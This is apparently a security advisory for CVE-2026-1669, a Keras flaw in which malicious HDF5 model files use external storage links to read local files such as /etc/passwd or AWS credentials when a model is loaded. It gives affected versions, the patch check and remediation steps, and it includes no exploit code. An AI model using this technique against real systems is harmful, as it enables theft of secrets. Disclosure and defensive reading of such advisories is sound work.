Model Poisoning: Turning Keras Weights into Weaponized File Readers
Vulnerability ID: CVE-2026-1669
CVSS Score: 7.1
Published: 2026-02-18
A high-severity Arbitrary File Read vulnerability in the Keras machine learning library allows attackers to exfiltrate sensitive local files (like /etc/passwd or AWS credentials) by embedding 'External Storage' links within malicious HDF5 model files. This affects Keras versions 3.0.0 through 3.13.1.
TL;DR
Keras blindly trusted HDF5 'external datasets' when loading models. Attackers can craft a .keras file where the model weights are actually pointers to local files on the victim's machine. When loaded, the model reads your secrets into memory as tensors.
⚠️ Exploit Status: POC
Technical Details
- CWE ID: CWE-73 (External Control of File Name or Path)
- CVSS v4.0: 7.1 (High)
- Attack Vector: Network / Local
- EPSS Score: 0.00039
- Exploit Maturity: Proof of Concept (PoC)
- Affected Component: keras.src.saving.saving_lib
Affected Systems
- Keras 3.0.0
- Keras 3.1.0
- Keras 3.13.1
- Any Python application using Keras to load untrusted models
-
Keras: >= 3.0.0, < 3.13.2 (Fixed in:
3.13.2)
Code Analysis
Commit: 8a37f9d
Fix checking for external dataset in H5 file
if dataset.external:
raise ValueError("Not allowed: H5 file Dataset with external links")
Exploit Details
- Giuseppe Massaro: Original PoC demonstrating local file inclusion via HDF5 external storage.
Mitigation Strategies
- Input Validation
- Sandboxing
- Dependency Management
Remediation Steps:
- Upgrade Keras to version 3.13.2 or later.
- Audit existing model pipelines to ensure untrusted models are not loaded with high privileges.
- Implement pre-loading checks using
h5dumpto scan forEXTERNAL_FILEheaders in HDF5 files.
References
Read the full report for CVE-2026-1669 on our website for more details including interactive diagrams and full exploit analysis.
Top comments (0)